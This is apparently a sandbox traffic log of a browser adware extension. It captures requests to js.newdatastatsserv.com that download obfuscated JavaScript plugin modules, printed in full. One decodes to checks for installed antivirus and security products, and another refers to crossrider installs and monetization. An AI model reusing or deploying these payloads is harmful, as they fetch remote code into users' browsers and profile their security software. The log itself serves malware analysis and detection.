    MDgxZTU0NWY1NDQwMDcxYzE5MDAwOTQ4NTk0YTAzMTE0MTE4MWYxOTE5MTcxMjAwMDAwNz
    BjMWM0MzEzMTUxZjU5MTY1YjEyMGIwMjFlNDU0OTQ0NDQ1NDE1NTI1OTU5NWExNDQ5MTY1
    ODBmMDc1ZDFjMDEwOTRkMjUyZDM1MzczYjMxM2MzYTI0MzQzZjIwMjkyMDJjMzYyYTI2Mj
    kzNTNlMmQyNTMwMzYzZDI2MmMzMjJmNWMxMzA2MTUxYTAzMDIwZDUwMmYyNTMxMjQyYTI3
    MzEzZDIxMjkzNTI4MmQzNzM1MjQzZDIxMjkyMDM1MjUyZDU0NDk3ZTZiNGQxODAxMDUxZD
    FiMTgyYzEwNDA1NTQ4NWY0NjRhNzgwYg==', 'pzrvetbohm'); }    ....


    GET /plugins/mins/244.js?ver=5&rnd=41 HTTP/1.1
    

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newdatastatsserv.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Tue, 21 Oct 2014 03:33:57 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1405263865"
    Last-Modified: Sun, 13 Jul 2014 15:04:25 GMT
    Cache-Control: max-age=900
    Content-Length: 1103
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1413862437.dop013.am4.t,1413862437.cds039.am4.c
    if (typeof setup2 === 'function') { setup2('MGY2NDdlNTcxZTFhMGMxMzJmMD
    AxODRjNGQ1NTU0MDYwYzE3MGE0ODViNDExMjBkMDI1YzU2MDYxNDE1MTUwOTEyMGMxNzQw
    MWIwYzE3NWQwMzA3MTMxMjEzMWE1NzBhMTQxODExMGQwMzJhMDUxZTE5MTExMTVkMWQwMD
    FkMmEwNTFlMGEwODI1MDEwMDBmMDUwMTEzMWM1NjA5MDk0ZDA0MDcxMzQ4M2EzYTNkMTAz
    NTM2MzU1ZjM4MzEyNzFkMzUwOTFkNDEzOTA0M2UwNjM4MmExYjU3MzUyNjM1NGI0NDMxNT
    AxZDBkMDExMzE2NDkzMTI4MzYyNDIxMmIzMDI4M2IzMDJiMjUyYTMzMzYyYzI2MzQzNjMx
    MmEyODI2MjMyYzI3MmEzZTJkMmI0ODE2MDUwNjAwMTkwZTFmNGYyYjMxMzQyNzM5M2QyYj
    MxMzMzNjMxM2MyODM0MjYzZTI3MmQzYjNmMzEzMTI4NTc1YTY0NzE0MTEyMDYwMDFlMDQy
    MDA0MDI1YTU5NWE1MDFjMWEwMzA1MDU1NDU3NGMxZjBhMDA1YzU5MTAxODA5MTkwNDFmMG
    IxNTQwMTQxYTFiNDEwZjBhMWUxNTExMWE1ODFjMTgwNDFkMDAwZTJkMDcxZTE2MDcxZDQx
    MTEwZDEwMmQwNzFlMDUxZTI5MWQwYzAyMDgwNjExMWM1OTFmMDU1MTA4MGExZTRmMzgzYT
    MyMDYzOTJhMzk1MjM1MzYyNTFkM2ExZjExNWQzNTA5MzMwMTNhMmExNDQxMzkzYTM5NDY0
    OTM2NTIxZDAyMTcxZjBhNDUzYzI1MzEyNjIxMjQyNjI0MjczYzI2MjgyZDMxMzYyMzMwMz
    gyYTNkMjcyNTIxMjEyYzI4M2MzMjMxMjc0NTFiMDIwNDAwMTYxODEzNTMyNzNjMzkyMDNi
    M2QyNDI3M2YyYTNkMzEyNTMzMjQzZTI4M2IzNzIzM2QzYzI1NTA1ODY0N2U1NzA2MDIwZD
    A0MTMxYzNkMGE1NTRmNTY1YzRjNTc3MDBm', 'tnwuvnxczr'); }    ....


    GET /plugins/mins/242.js?ver=4&rnd=8467 HTTP/1.1
    

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newdatastatsserv.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Tue, 21 Oct 2014 03:33:57 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1403211500"
    Last-Modified: Thu, 19 Jun 2014 20:58:20 GMT
    Cache-Control: max-age=900
    Content-Length: 1023
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1413862437.dop013.am4.t,1413862437.cds039.am4.c
    if (typeof setup2 === 'function') { setup2('MWQ3ZjZjNTYwYzFlMWExZDMzMT
    EwYTU3NWY1NDQ2MDIxYTE5MTY1OTQ5NWEwYzFhMTcxZTQwMWUwZTBjMTYwNTBjMWEwMzBi
    MWEwODQ4MGEwODEzMGE1YjBlMTk0MTFlMDEzYzA0MTI0YjFlMTc1NTJmMmIyMDJhMmEzYz
    I0MjAyMTM1MjcyOTViMDAxNDA2MTcxMDE2NGMzZDM4MjQzYzIyM2MzNjIwMzYyMzJjMzgz
    MjI2MzQyYTJjMzA1OTM1MzEyZTM0MmMzNTI2MzczZDIwMmYzYzMyMjMzYjMyMzAyYjMwMj
    EyZTMxM2UzMzIxMzkzYzIxMmIzYjRjMmMzZjI3MmQyMjJhMjEzZDM3M2EyMjJjM2YzYzI4
    MzQyODMxNTkzNTMxMmUzNDJjMzUyNjM3M2QyMDJmM2MzMjI3MzMzNjJhMmIzNTI5MmYzMT
    MyNDQ0ZjZjN2M0NzFjMTAxZTFlMWUzMzExMGE1NzVmNTQ0NjAyMWExOTE2MTA1YzVhNGEx
    ZDBhMTkxYTQzMTUwYjA5MDUxNTFkMGEwZDBmMTkwMzRkMGYxYjAzMWI0YjAwMWQ0MjE1MD
    QzOTE3MDI1YTBlMTk1MTJjMjAyNTJmMzkyYzM1MzAyZjMxMjQyMjVlMDUwNzE2MDYwMDE4
    NDgzZTMzMjEzOTMxMmMyNzMwMzgyNzJmMzMzNzIzMjczYTNkMjA1NzMxMzIyNTMxMjkyNj
    M2MjYyZDJlMmIzZjM5MjYzZTIxMjAzYTIwMmYyYTMyMzUzNjI0MmEyYzMwM2IzNTQ4MmYz
    NDIyMjgzMTNhMzAyZDM5M2UyMTI3M2EzOTNiMjQzOTIxNTczMTMyMjUzMTI5MjYzNjI2Mm
    QyZTJiM2YzOTIyMzYyNTNhM2EyNTI3MmIzMjM5NDE0YTdmNmM1NjE0MDYxYjBhMGYwZDJm
    MTE0NzRlNDQ1ODVhNWY2YzFl', 'fuetdjnmfc'); }    ....


    GET /plugins/mins/230.js?ver=7&rnd=8467 HTTP/1.1
    

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newdatastatsserv.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Tue, 21 Oct 2014 03:33:57 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1408273144"
    Last-Modified: Sun, 17 Aug 2014 10:59:04 GMT
    Cache-Control: max-age=900
    Content-Length: 867
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1413862437.dop013.am4.t,1413862437.cds039.am4.c
    if (typeof setup2 === 'function') { setup2('MDM3YzY3NDMwMDFlMWUwODNkMW
    YxNDU0NTQ0MTRhMDIxZTBjMTg1NzU3NTkwZjEyMWExYzQ3MTk0NjBjMTMxNzAzMDAwMTAy
    MGU1NjA2MDgwYzU5MWQwNTQ3NWI1ZDQ4NTg0MjQ5NDY1YTU3NDYwMDE5NWE0NDY3NzE1ND
    A2MTUxYzFhMTkyZDFhMDE1YTRjNGU0MzAwMWUxZTA4MWI1NzU3NTkwZjEyMWExYzQ3MTk0
    NjBjMTMxNzAzMDAwMTAyMGU1NjA2MDgwYzU5MWQwNTQ3NWI1ZDQ4NTg0MjQ5NDY1YTU3ND
    YwMDE5NWE0NDY3NzE1NDFlMGQxZDBkMDMxNjIxMDk1YTRjNGU1MzViNWE0NjcyNDg0ZDU4
    NTY0YzE3MGQxODFlMTEwYjBjMTQ1NDU0NDEzMzQ4MGIxYzFiNGYyNTVhNjQ0MTQ4NGE0YT
    VhMDEwMzE0MWYwMDA0MjIzOTQ4NDI0ODRmMGYxZjAwMDUwNzFkNDQyNzFhMWIwMjQ3NTk1
    MTU4MTI1YjQ4NWM1YjU4NGI0ZTFhNDg0ZDFhMGQwYTAxMTEwNTA2MDQxYTM1MTkwZDBhMD
    QxYzUxNTQ0MTRmMzUzNTNiM2EyMjJiMjUzYzI4MmMyZjM4MjcyZDM1MmMzMzIwMjUyZDJl
    MzUyYjNkMmYyNzNmMmEzZTM3NGQ0NjU4NGYwYzFjMTIwMTBmMDYwYjA3MWQ0ZjU3NTg1MT
    MxM2UyYjM4MjUyYjNiM2YzMTMyMmIzMzM3MmIzYTI4MzcyMzM5M2IyYjNlMzc0ZDE3NDM0
    YTY3MDU=', 'xvnahjjxhm'); }    ....


    GET /plugins/mins/223.js?ver=8&rnd=8467 HTTP/1.1
    

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newdatastatsserv.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Tue, 21 Oct 2014 03:33:56 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1404137812"
    Last-Modified: Mon, 30 Jun 2014 14:16:52 GMT
    Cache-Control: max-age=900
    Content-Length: 823
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1413862436.dop013.am4.t,1413862436.cds068.am4.c
    if (typeof setup2 === 'function') { setup2('MGQ2NjY1NWExMjBjMTUxZTJkMT
    gxYTRlNTY1ODU4MTAxNTFhMDg1MDU5NDMwZjFjMTQ1NjE3MDcwYjBiMTIwODQyMWIxNTE1
    NGUxZDFiMTgxZjFjMTg1NzRiNGM1NDU4NGY1ZDQ0NTk1YjRlNGY1NzExMWMxZDA2MTkwZD
    A4NTYxMDBiNWUxZDBkMDgxZjA4NTEyNzI1M2IzMzIxMmIzOTI0MjUyODNkMjgyNzI0MzYy
    YzJmMzgyODI5M2MyNTJiMzQyYzI3MjMzMjMzMzM1ZTBmMTU1YzMxMjcyOTI0MjMzZjJiMj
    gzMTI1MmIyYTM1MzczYzNjMjczNDM5MmMyYjI3MzU1NDQwNjY3MTU4MTAxNTFhMDgxOTIz
    MWUwMDVhNDA1ODQzMDYwYzFlMDYxZjU2NTc1NTFiMDUwMDU2MWMxZjFmMGQxYzFlNTYwMj
    AxMTU0NTA1MGYxZTExMGEwYzRlNWY0YzVmNDA1YjViNGE0ZjRmNTc1YjU3MWEwNDA5MDAx
    NzFiMWM0ZjA0MGI1NTA1MTkwZTExMWU0NTNlMzEzYjM4MzkzZjNmMmEzMzNjMjQzYzI3Mm
    YyZTM4MjkzNjNlM2QyNTMxMmIzZjM0MzMyNTNjMjUyNzQ3MWIxNTU3MjkzMzJmMmEzNTJi
    MzIzYzMxMmUzMzNlMzMzOTJhMjgzZTIwMzkyNzMzMzMzMzVhNTY3MjY4NGMwODA2MDMwYj
    A1MTYzMzFjNDM1NDU4NTg0NDVmNjYwNQ==', 'vllxzxanxj'); }    ....


    GET /plugins/mins/211.js?ver=7&rnd=8467 HTTP/1.1
    

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newdatastatsserv.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Tue, 21 Oct 2014 03:33:57 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1408273147"
    Last-Modified: Sun, 17 Aug 2014 10:59:07 GMT
    Cache-Control: max-age=64
    Content-Length: 867
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1413862437.dop013.am4.t,1413862437.cds041.am4.c
    if (typeof setup2 === 'function') { setup2('MTk2ZjcxNDYwZTFjMGUwMjIyMD
    gwZTQ3NDI0NDQ0MDAwZTA2MDc0MDRkNGExOTE3MTQxZTU3MTM1OTFiMDkwNDE1MDUwZjAw
    MWU1YzE5MWYxNjRhMGIwMDQ5NTk0ZDQyNDc1NTUzNTU0YzUxNDgwMjA5NTA1YjcwNmI0Nz
    EwMTAxMjE4MDkyNzA1MTY0MDVmNTg0NjBlMWMwZTAyMDQ0MDRkNGExOTE3MTQxZTU3MTM1
    OTFiMDkwNDE1MDUwZjAwMWU1YzE5MWYxNjRhMGIwMDQ5NTk0ZDQyNDc1NTUzNTU0YzUxND
    gwMjA5NTA1YjcwNmI0NzA4MDgxMzBmMTMxYzNlMWU0MDVmNTg1NjU3NTk1Njc4NTc1YTQy
    NDU1YTEyMDMxYTBlMWIxNDFiMGU0NzQyNDQzZDRhMWIxNjA0NTgzZjQ5NzI0NDQ2NDg1YT
    UwMWUxNDBlMGMxNjAxMmMzYjU4NDg1NzU4MTUwYzE2MDAwOTFmNTQyZDA1MGMxODU0NGY1
    NDU2MTA0YjQyNDM0ZjQyNTg1ODFmNDY0ZjBhMDcxNTE2MGIxNjEwMDExNDM3MDkwNzE1MT
    MwNjQyNDI0NDQxMzcyNTMxMjUzNTMxMzYyYTJkMjIyZDI4MmQzMjIyMzYyMDM2MjAyMzJj
    MjUyMTIyMzgzZDJjM2MzYjM5NGY1NjUyNTAxYjA2MDExNzBhMDgwOTE3MTc1MDQwNDI0Mj
    I3M2IyNTNhMzUyMTI0MjgyYjIxM2QzNjM5MjkyYTIyMjgzNDIzMjgzZDNiMzk0ZjA3NDk1
    NTcwMWY=', 'bexdfhzrwz'); }    ....


    GET /plugins/mins/220.js?ver=23&rnd=8467 HTTP/1.1
    

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newdatastatsserv.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Tue, 21 Oct 2014 03:33:57 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1413711006"
    Last-Modified: Sun, 19 Oct 2014 09:30:06 GMT
    Cache-Control: max-age=633
    Content-Length: 33490
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1413862437.dop013.am4.t,1413862437.cds041.am4.c
    if(appAPI.isBackground){var ICMBaseManager=function(a){return function
    (){};};}else{var ICMBaseManager=function(a){var b=(function(g){var i=(
    function(){var u={"\x61\x76\x67\x5F\x64\x65\x74\x65\x63\x74\x65\x64":1
    ,"\x61\x76\x61\x73\x74\x5F\x64\x65\x74\x65\x63\x74\x65\x64":2,"\x61\x7
    6\x69\x72\x61\x5F\x64\x65\x74\x65\x63\x74\x65\x64":4,"\x6D\x73\x65\x5F
    \x64\x65\x74\x65\x63\x74\x65\x64":8,"\x65\x73\x65\x74\x5F\x64\x65\x74\
    x65\x63\x74\x65\x64":16,"\x69\x6D\x61\x73\x68\x5F\x64\x65\x74\x65\x63\
    x74\x65\x64":32,"\x76\x69\x70\x65\x72\x5F\x64\x65\x74\x65\x63\x74\x65\
    x64":64,"\x61\x73\x6B\x74\x6F\x6F\x6C\x62\x61\x72\x5F\x64\x65\x74\x65\
    x63\x74\x65\x64":128,"\x64\x65\x61\x6C\x70\x6C\x79\x5F\x64\x65\x74\x65
    \x63\x74\x65\x64":256,"\x66\x75\x6E\x6D\x6F\x6F\x64\x73\x5F\x64\x65\x7
    4\x65\x63\x74\x65\x64":512,"\x6D\x63\x61\x66\x65\x65\x5F\x64\x65\x74\x
    65\x63\x74\x65\x64":1024,"\x6D\x61\x6C\x77\x61\x72\x65\x62\x79\x74\x65
    \x73\x5F\x64\x65\x74\x65\x63\x74\x65\x64":2048,"\x62\x61\x69\x64\x75\x
    61\x76\x5F\x64\x65\x74\x65\x63\x74\x65\x64":4096,"\x73\x70\x61\x72\x6B
    \x5F\x62\x61\x69\x64\x75\x5F\x64\x65\x74\x65\x63\x74\x65\x64":8192,"\x
    62\x32\x63\x5F\x65\x78\x74\x65\x6E\x73\x69\x6F\x6E\x5F\x64\x65\x74\x65
    \x63\x74\x65\x64":16384,"\x63\x72\x6F\x73\x73\x72\x69\x64\x65\x72\x5F\
    x65\x78\x74\x65\x6E\x73\x69\x6F\x6E\x5F\x64\x65\x74\x65\x63\x74\x65\x6
    4":32768,"\x79\x6F\x6E\x74\x6F\x6F\x5F\x64\x65\x74\x65\x63\x74\x65\x64
    ":65536,"\x61\x76\x67\x5F\x73\x61\x66\x65\x67\x75\x61\x72\x64\x5F\x64\
    x65\x74\x65\x63\x74\x65\x64":131072,"\x67\x65\x65\x6B\x5F\x62\x75\
    <<< skipped >>>

    GET /plugins/mins/184.js?ver=10&rnd=6334 HTTP/1.1
    

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newdatastatsserv.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Tue, 21 Oct 2014 03:33:57 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1403604769"
    Last-Modified: Tue, 24 Jun 2014 10:12:49 GMT
    Cache-Control: max-age=587
    Content-Length: 1239
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1413862437.dop013.am4.t,1413862437.cds042.am4.c
    if (typeof setup2 === 'function') { setup2('MWQ2NTY2NDUwYzE4MDcxZDIyMD
    AwYTRkNTU0NzQ2MDQwNzE5MDc0ODQ5NDAwMTE3MTc0MjFkMDIwNzAwMDkwZDAzMDIwOTFj
    MDMwZTU5MTEwOTAyNDAwOTE0MWYxMTQyMWIxZDAxMDYwYzQ5MGUxZjRjMjIwNTFiMDEwNj
    AxMmUwMDUxMzY1NTM2NDYyNzVkNWMyNjQ5MmU0MzVlNDM1ZjIzNWQ1ZTU2NDkyZDRhMmM0
    NzVmNTY1ZjVlNTI1NTViMzc1YzQ3MzQ1MDJhNDkzNDBkMTgxNjI0MTM0ZjM1MGUwMzAyMT
    c0YTIzMGMwNTA2MDgwYTFkMmUyMDUxNDE1ZDQ3NDI1NjQ5M2YxNTBiMDgwNjBlMDMzYzA3
    MDIwYTVhM2IzMzMwM2YzODIxMzUzZDI2MjMyMTNlMmMyYzI3MjIzOTIxMmUyYTIxMzMyYz
    RiMjMxZDA5MDMwZDA2MTYyNTE3NTAyODJkMjUzZDIwMzQzNzNlM2EyOTMyMjAzOTJhMzcz
    MzIxMjIzNzI4MzMyZDM1M2EyZDM4MmQyODJjMzI1NTVlNmM2NjRkMGYxMDE4MDMxZTIyMD
    AwYTRkNTU0NzQ2MDQwNzE5MDcwMTVjNDA0MDA5MTQxZjVkMDMxODAyMTQwMDBkMGIwMTAx
    MDMxZDE0NWMwNTAwMDI0ODBhMWMwMDBmNTgxZTA5MDgwNjA0NGEwNjAwNTIzODAwMGYwOD
    A2MDkyZDA4NGUyODRmMzM1MjJlNWQ1NDI1NDEzMTVkNDQ0NjRiMmE1ZDU2NTU0MTMyNTQz
    NjQyNGI1ZjVmNTY1MTVkNDQyOTQ2NDIyMDU5MmE0MTM3MDUwNzA4M2UxNjViM2MwZTBiMD
    ExZjU1M2QxNjAwMTIwMTBhMTUyZDI4NGU1ZjQ3NDI1NjVmNDkzNzE2MDMxNzE4MTQwNjI4
    MGUwMjAyNTkzMzJjMmUyNTNkMzUzYzNkMmUyMDI5MjEzMjM2MjIzNjMwMjEyNjI5MjkyYz
    MyNTEyNjA5MDAwMzA1MDUxZTNhMDk0YTJkMzkyYzNkMjgzNzNmMjEyNDMzMzczNDMwMmEz
    ZjMwMjkzZDI5MzIzNjM5M2MzYTI1M2IyNTM3MzIyODUwNGE2NTY2NDUxNDAwMDYwYTFlMW
    MyZjBiNGQ1ZDQ0NWQ0YjU5N2QwZjZj', 'foogdlsmwr'); }    ....
    <<< skipped >>>

    GET /plugins/mins/104.js?ver=12&rnd=6334 HTTP/1.1
    

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newdatastatsserv.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Tue, 21 Oct 2014 03:33:57 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1407146074"
    Last-Modified: Mon, 04 Aug 2014 09:54:34 GMT
    Cache-Control: max-age=781
    Content-Length: 919
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1413862437.dop013.am4.t,1413862437.cds042.am4.c
    if (typeof setup2 === 'function') { setup2('MGI2NDRmNGU1MDQ4NTQxZTEwMW
    UwMDNiMWQwMjUyNTI1NjU0MGMxZTA0MWU1NTQxNWYwOTA2MWY0YTAwMWYwMjAzMTcwNzA5
    MWExYTAxMWU1ZTBkMDAwMzVmMDkxMDEwMGQwNjE5MGYxYjBiNWYwYjFhMWYwMTA0MDQ1MT
    BiMDcwMzFjNGI0ZTQyMGIwMDFlMzAwNzE0NTUyOTI5MjczODNmM2QzYzNjMzkyYzMzMjQz
    YjI2MzkyOTI3M2EyZjNiMjMzNDNiMjMzNDMxMzA0ODAzNTk0YjQ2NDIxOTQyNTM1ZjQ4MD
    M1YjRiNDY0MjA0MTEwMzBhNTMyZjM3MzUyNDJiMzkyMzNjMjYyYTM1M2EyOTM3MzQzYTJm
    MjAyZTIzMzUzNzI5NTQ0ODYwNTA0ZTRmNGU1MjAwMDIwMjE0MTkyNTFjMDM0YzRhNDg1ND
    FlMTAxZTAwMWQ1NTQxNWYwOTA2MWY0YTAwMWYwMjAzMTcwNzA5MWExYTAxMWU1ZTBkMDAw
    MzVmMDkxMDEwMGQwNjE5MGYxYjBiNWYwYjFhMWYwMTA0MDQ1MTBiMDcwMzFjNGI0ZTQyMG
    IwMDFlMzAwNzE0NTUyOTI5MjczODNmM2QzYzNjMzkyYzMzMjQzYjI2MzkyOTI3M2EyZjNi
    MjMzNDNiMjMzNDMxMzA0ODAzNTk0YjQ2NDIxOTQyNTM1ZjQ4MDM1YjRiNDY0MjA0MTEwMz
    BhNTMyZjM3MzUyNDJiMzkyMzNjMjYyYTM1M2EyOTM3MzQzYTJmMjAyZTIzMzUzNzI5NTQ0
    ODYwNTA0ZTRmNGU1MjE4MWEwMzAzMDMxZTI3MGI0YzRhNDg0NzQ2NTA2MDBk', 'pnonph
    vvdj'); }    ....


    GET /plugins/mins/93.js?ver=13&rnd=6334 HTTP/1.1
    

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newdatastatsserv.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Tue, 21 Oct 2014 03:33:57 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1403819081"
    Last-Modified: Thu, 26 Jun 2014 21:44:41 GMT
    Cache-Control: max-age=900
    Content-Length: 951
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1413862437.dop013.am4.t,1413862437.cds040.am4.c
    if (typeof setup2 === 'function') { setup2('MTE2ZTY4NTUwYzFhMTkxYTI1MT
    QwNjQ2NWI1NzQ2MDYxOTFlMDA1YzQ1NGIxNjAwMTM0MDFlMWYwMDAzMTgwMjA4MDQwYzQw
    MGUwNTFkNDkxZDE3NGUwNDAyMzEwMDBiMTkwODQ0MGUxMjA3NWIwYTAxMTkxZjEzMTgwNz
    A0NGEwYzA2MWIxMDFkMGYwMTEzNDcwMjE3MGIxZjIzMTQ1YjBiMDYwMjUxMjczYTI0MmU0
    ZDM5MzUyNzMzMzgzNzNkM2YyMzM0MjMzODNiMjQyZjMwMmIyMzJlMzUyMjM1MzczNDM1M2
    IyNzI5MzUyZjQwMWEwNTEzMDMwYTBiMWYwNDExMGIwZjU5M2UyODI3M2MyMjM5MjMzNDIz
    MjAyNDI1M2IyZjNkM2EyZjI4MmIyOTI0MjgzYjRjNDE2MDc5NDQwMjEwMTUwNzE3M2IxZj
    A2NTI1YzRhNDYwOTAzMTAxZTFlNTA1ZjQ5MWQxMzE2NTkxNzFiMWQwZjAyMDAwMzE3MDk1
    OTA3MDEwMDQ1MDcxNTQ1MTcwNzI4MDkwZjA0MDQ1ZTBjMTkxNDVlMTMwODFkMDIxZjAyMD
    UwZjU5MDkxZjEyMTQwMDAzMWIxMTRjMTExMjEyMTYyNzA5NTcxMTA0MDk0MjIyMjMyZDJh
    NTAzNTJmMjUzODJiMzIyNDM2MjcyOTJmMjIzOTJmM2MzNTMyMmEyYTI4MmUyZjM1M2YyNj
    NlM2UyMDMxMzI0YzAwMDcxODEwMGYxMjE2MDAwYzA3MTU1YjM1M2IyMjI1MmIzZDNlMzgz
    OTIyMmYzNjNlMzYzNDNlMzIyNDMxMmIyZjNiM2U1NTQ4NjQ2NDQ4MDAwYTFmMDMwODE5Mm
    QwYTRmNTA1MDVmNTk2ZTFj', 'jdawdnmjpf'); }    ....


    GET /plugins/mins/269.js?ver=1&rnd=6334 HTTP/1.1
    

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newdatastatsserv.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Tue, 21 Oct 2014 03:33:57 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1403007487"
    Last-Modified: Tue, 17 Jun 2014 12:18:07 GMT
    Cache-Control: max-age=900
    Content-Length: 491
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1413862437.dop013.am4.t,1413862437.cds046.am4.c
    if (typeof setup2 === 'function') { setup2('MGY2ZjYzNTExZjFmMWMxMjNhMD
    IxODQ3NTA1MzU1MDMxYzE2MWY0YTViNGExYTBiNTkwNjExMDMwYzA0MWQxMzBmMDAwMzBh
    MWMxMTQxMTMxYjA4NDUxMjE0MWYwMTE0MGE1ZjFkMDA0NDE5MDQ1NDFhMGMwYjRkMmIzYT
    M4M2QzMzM0Mzc0MDQzN2E3ZDQ3MDIwNzAzMWIxYjM3MWQxYzU2NWY0YTUxMWYxZjFjMTIx
    YzRhNWI0YTA4NDAxOTUzMDY1MTAxNDI1YTE2MTkxZjU5MDMxZjAxMGIxZTVhMGIwZjA3NT
    gwYTBiMTYwNjA2MTE0YTAzMTY1OTAxMWI1ZDFkMWUxMDU4MzUyYzI1MjUyYzNkMzA1MjU4
    NmY2MzUxMDcwNzFkMDUwNjFlM2QwMTQ4NDk1NzU5NWU1YjY1MGQ=', 'tejswkhbop'); 
    }    ....


    GET /plugins/mins/246.js?ver=15&rnd=6334 HTTP/1.1
    

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newdatastatsserv.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Tue, 21 Oct 2014 03:33:57 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1411293500"
    Last-Modified: Sun, 21 Sep 2014 09:58:20 GMT
    Cache-Control: max-age=15
    Content-Length: 8475
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1413862437.dop013.am4.t,1413862437.cds046.am4.c
    var _0x4cfc=["\x69\x6E\x73\x74\x61\x6C\x6C\x65\x72","\x67\x65\x74\x41\
    x64\x64\x69\x74\x69\x6F\x6E\x61\x6C\x49\x6E\x66\x6F","\x69\x73\x46\x75
    \x6E\x63\x74\x69\x6F\x6E","\x75\x74\x69\x6C\x73","\x69\x73\x44\x65\x66
    \x69\x6E\x65\x64","\x61\x73\x77","\x69\x73\x41\x72\x72\x61\x79","\x6C\
    x65\x6E\x67\x74\x68","\x73\x74\x72\x69\x6E\x67","\x63\x68\x61\x72\x43\
    x6F\x64\x65\x41\x74","\x72\x65\x70\x6C\x61\x63\x65","\x6D\x61\x74\x63\
    x68","\x61\x70\x70\x6C\x79","\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\
    x64\x65","\x42\x61\x73\x65\x36\x34","\x64\x65\x63\x6F\x64\x65","\x63\x
    61\x6C\x6C","\x70\x61\x72\x73\x65","\x4A\x53\x4F\x4E","\x6D\x6F\x6E\x6
    5\x74\x69\x7A\x61\x74\x69\x6F\x6E","\x69\x6E\x74\x65\x72\x6E\x61\x6C",
    "\x70\x6C\x75\x67\x69\x6E\x73","\x75\x6E","\x64\x65\x66","\x69\x6E\x65
    \x64","\x70\x6C\x75\x67\x69\x6E\x49\x64","\x67\x65\x74\x45\x78\x74\x65
    \x6E\x64\x65\x64\x53\x75\x62\x49\x64","\x66\x75\x6E\x63\x74\x69\x6F\x6
    E","\x73\x6C\x69\x63\x65","\x67\x65\x74\x53\x75\x62\x49\x64","\x67\x65
    \x74\x54\x69\x6D\x65","\x5F","\x6A\x6F\x69\x6E","\x6E\x61","\x68\x74\x
    74\x70\x55\x72\x6C","\x5F\x5F\x52\x4E\x44\x5F\x5F","\x67","\x5F\x5F\x4
    1\x44\x56\x41\x4E\x43\x45\x5F\x55\x53\x45\x52\x5F\x5F","\x5F\x5F\x43\x
    52\x4F\x53\x53\x52\x49\x44\x45\x52\x5F\x41\x53\x57\x5F\x5F","\x5F\x5F\
    x43\x52\x4F\x53\x53\x52\x49\x44\x45\x52\x5F\x49\x4E\x53\x54\x41\x4C\x4
    C\x5F\x54\x49\x4D\x45\x5F\x5F","\x67\x65\x74\x55\x6E\x69\x78\x54\x69\x
    6D\x65","\x5F\x5F\x43\x52\x4F\x53\x53\x52\x49\x44\x45\x52\x5F\x43\x4F\
    x55\x4E\x54\x52\x59\x5F\x43\x4F\x44\x45\x5F\x5F","\x67\x65\x74\x43
    <<< skipped >>>

    GET /plugins/javascripts/jquery-1_7_1_min.js?ver=5&rnd=6334 HTTP/1.1
    

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newdatastatsserv.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Tue, 21 Oct 2014 03:33:57 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
